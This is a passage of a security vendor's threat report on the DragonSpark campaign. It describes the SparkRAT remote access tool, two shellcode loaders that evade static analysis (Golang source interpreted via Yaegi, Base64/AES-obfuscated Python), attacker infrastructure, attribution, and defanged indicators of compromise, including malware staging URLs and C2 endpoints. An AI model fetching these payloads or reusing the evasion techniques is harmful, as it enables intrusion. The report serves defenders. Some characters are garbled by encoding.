In the attacks we observed, the version of SparkRAT was 6920f726d74efb7836a03d3acfc0f23af196765e, built on 1 November 2022 UTC. This version supports 26 commands that implement a wide range of functionalities:

  • Command execution: including execution of arbitrary Windows system and PowerShell commands.
  • System manipulation: including system shutdown, restart, hibernation, and suspension.
  • File and process manipulation: including process termination as well as file upload, download, and deletion.
  • Information theft: including exfiltration of platform information (CPU, network, memory, disk, and system uptime information), screenshot theft, and process and file enumeration.
SparkRAT version
SparkRAT version

Golang Source Code Interpretation For Evading Detection

The Golang malware m6699.exe uses the Yaegi framework to interpret at runtime encoded Golang source code stored within the compiled binary, executing the code as if compiled. This is a technique for hindering static analysis and evading detection by static analysis mechanisms.

The main purpose of m6699.exe is to execute a first-stage shellcode that implements a loader for a second-stage shellcode.

m6699.exe first decodes a Base-64 encoded string. This string is Golang source code that conducts the following activities:

  • Declares a Main function as part of a Run package. The run.Main function takes as a parameter a byte array โ€“ the first-stage shellcode.
  • The run.Main function invokes the HeapCreate function to allocate executable and growable heap memory (HEAP_CREATE_ENABLE_EXECUTE).
  • The run.Main function places the first-stage shellcode, supplied to it as a parameter when invoked, in the allocated memory and executes it.
Golang source code in m6699.exe
Golang source code in m6699.exe

m6699.exe then evaluates the source code in the context of the Yaegi interpreter and uses Golang reflection to execute the run.Main function. m6699.exe passes as a parameter to run.Main the first-stage shellcode, which the function executes as previously described. m6699.exe stores the shellcode as a double Base64-encoded string, which the malware decodes before passing to run.Main for execution.

The first-stage shellcode that run.Main executes in double Base64-encoded and decoded form
The first-stage shellcode that run.Main executes in double Base64-encoded and decoded form

The first-stage shellcode implements a shellcode loader. The shellcode connects to a C2 server using the Windows Sockets 2 library and receives a 4-byte big value. This value is the size of a second-stage shellcode for which the first-stage shellcode allocates memory of the received size. The first-stage shellcode then receives from the C2 server the second-stage shellcode and executes it.

When m6699.exe executes, the threat actor can establish a Meterpreter session for remote command execution.

A Meterpreter session with an m6699.exe instance (in a lab environment)
A Meterpreter session with an m6699.exe instance (in a lab environment)

ShellCode_Loader

ShellCode_Loader is the internal name of a PyInstaller-packaged malware that is implemented in Python. ShellCode_Loader serves as the loader of a shellcode that implements a reverse shell.

ShellCode_Loader uses encoding and encryption to hinder static analysis. The malware first Base-64 decodes and then decrypts the shellcode. ShellCode_Loader uses the AES CBC encryption algorithm, and Base-64 encoded AES key and initialization vector for the decryption.

ShellCode_Loader decodes and decrypts shellcode
ShellCode_Loader decodes and decrypts shellcode

ShellCode_Loader uses the Python ctypes library for accessing the Windows API to load the shellcode in memory and start a new thread that executes the shellcode. The Python code that conducts these activities is Base-64 encoded in an attempt to evade static analysis mechanisms that alert on the use of Windows API for malicious purposes.

ShellCode_Loader executes shellcode
ShellCode_Loader executes shellcode

The shellcode creates a thread and connects to a C2 server using the Windows Sockets 2 library. When the shellcode executes, the threat actor can establish a Meterpreter session for remote command execution.

A Meterpreter session with a ShellCode_Loader instance (in a lab environment)
A Meterpreter session with a ShellCode_Loader instance (in a lab environment)

Infrastructure

The DragonSpark attacks leveraged infrastructure located in Taiwan, Hong Kong, China, and Singapore to stage SparkRAT and other tools and malware. The C2 servers were located in Hong Kong and the United States.

The malware staging infrastructure includes compromised infrastructure of legitimate Taiwanese organizations and businesses, such as a baby product retailer, an art gallery, and games and gambling websites. We also observed an Amazon Cloud EC2 instance as part of this infrastructure.

The tables below provide an overview of the infrastructure used in the DragonSpark attacks.

Malware staging infrastructure

IP address/Domain Country Notes
211.149.237[.]108 China A compromised server hosting web content related to gambling.
43.129.227[.]159 Hong Kong A Windows Server 2012 R2 instance with a computer name of 172_19_0_3. The threat actors may have obtained access to this server using a shared or bought account. We observed login credentials with the serverโ€™s name being shared over different time periods in the Telegram channels King of VP$ and SellerVPS for sharing and/or selling access to virtual private servers.
www[.]bingoplanet[.]com[.]tw Taiwan A compromised server hosting web content related to gambling. The website resources have been removed at the time of writing. The domain has been co-hosted with several other websites of legitimate business, including travel agencies and an English preschool.
www[.]moongallery.com[.]tw Taiwan A compromised server hosting the website of the Taiwanese art gallery Moon Gallery.
www[.]holybaby.com[.]tw Taiwan A compromised server hosting the website of the Taiwanese baby product shop retailer Holy Baby.
13.213.41[.]125 Singapore An Amazon Cloud EC2 instance named EC2AMAZ-4559AU9.

C2 server infrastructure

IP address/Domain Country Notes
103.96.74[.]148 Hong Kong A Windows Server 2012 R2 instance with a computer name of CLOUD2012R2.
The threat actors may have obtained access to this server using a shared or bought account. We observed login credentials with the serverโ€™s name being shared over different time periods in the Telegram channels Premium Acc, IRANHACKERS, and !Only For Voters for sharing and/or selling access to virtual private servers.
This set of infrastructure was observed resolving to jiance.ittoken[.]xyz at the time of writing. This specific domain can be linked to a wider set of Chinese phishing infrastructure over the past few years. It is unclear if they are related to this same actor.
104.233.163[.]190 United States A Windows Server 2012 R2 instance with a computer name of WIN-CLC0OFDKTMK.
The most recent passive DNS record related to this IP address points to a domain name with a Chinese TLD โ€“ kanmn[.]cn. However, this is shared hosting infrastructure through Aquanx and likely used by a variety of customers.
This IP address is known to have hosted a Cobalt Strike C2 server and been involved in other malicious activities, such as hosting known malware samples.

Attribution Analysis

We assess it is highly likely that a Chinese-speaking threat actor is behind the DragonSpark attacks. We are unable at this point to link DragonSpark to a specific threat actor due to lack of reliable actor-specific indicators.

The actor may have espionage or cybercrime motivations. In September 2022, a few weeks before we first spotted DragonSpark indicators, a sample of Zegost malware (bdf792c8250191bd2f5c167c8dbea5f7a63fa3b4) โ€“ an info-stealer historically attributed to Chinese cybercriminals, but also observed as part of espionage campaignsย  โ€“ was reported communicating with 104.233.163[.]190. We observed this same C2 IP address as part of the DragonSpark attacks. Previous research by the Weibu Intelligence Agency (ๅพฎๆญฅๆƒ…ๆŠฅๅฑ€) reported that Chinese cybercrime actor FinGhost was using Zegost, including a variant of the sample mentioned above.

In addition, the threat actor behind DragonSpark used the China Chopper webshell to deploy malware. China Chopper has historically been consistently used by Chinese cybercriminals and espionage groups, such as the TG-3390 and Leviathan. Further, all of the open source tools used by the threat actor conducting DragonSpark attacks are developed by Chinese-speaking developers or Chinese vendors. This includes SparkRAT by XZB-1248, SharpToken and BadPotato by BeichenDream, and GotoHTTP by Pingbo Inc.

Finally, the malware staging infrastructure is located exclusively in East Asia (Taiwan, Hong Kong, China, and Singapore), behavior which is common amongst Chinese-speaking threat actors targeting victims in the region. This evidence is consistent with our assessment that the DragonSpark attacks are highly likely orchestrated by a Chinese-speaking threat actor.

Conclusions

Chinese-speaking threat actors are known to frequently use open source software in malicious campaigns. The little known SparkRAT that we observed in the DragonSpark attacks is among the newest additions to the toolset of these actors.

Since SparkRAT is a multi-platform and feature-rich tool, and is regularly updated with new features, we estimate that the RAT will remain attractive to cybercriminals and other threat actors in the future.

In addition, threat actors will almost certainly continue exploring techniques and specificalities of execution environments for evading detection and obfuscating malware, such as Golang source code interpretation that we document in this article.

SentinelLabs continues to monitor the DragonSpark cluster of activities and hopes that defenders will leverage the findings presented in this article to bolster their defenses.

Indicators of Compromise

Description Indicator
ShellCode_Loader (a PyInstaller package) 83130d95220bc2ede8645ea1ca4ce9afc4593196
m6699.exe 14ebbed449ccedac3610618b5265ff803243313d
SparkRAT 2578efc12941ff481172dd4603b536a3bd322691
C2 server network endpoint for ShellCode_Loader 103.96.74[.]148:8899
C2 server network endpoint for SparkRAT 103.96.74[.]148[:]6688
C2 server network endpoint for m6699.exe 103.96.74[.]148:6699
C2 server IP address for China Chopper 104.233.163[.]190
Staging URL for ShellCode_Loader hxxp://211.149.237[.]108:801/py.exe
Staging URL for m6699.exe hxxp://211.149.237[.]108:801/m6699.exe
Staging URL for SparkRAT hxxp://43.129.227[.]159:81/c.exe
Staging URL for GotoHTTP hxxp://13.213.41.125:9001/go.exe
Staging URL for ShellCode_Loader hxxp://www.bingoplanet[.]com[.]tw/images/py.exe
Staging URL for ShellCode_Loader hxxps://www.moongallery.com[.]tw/upload/py.exe
Staging URL for ShellCode_Loader hxxp://www.holybaby.com[.]tw/api/ms.exe

โŒ
โŒ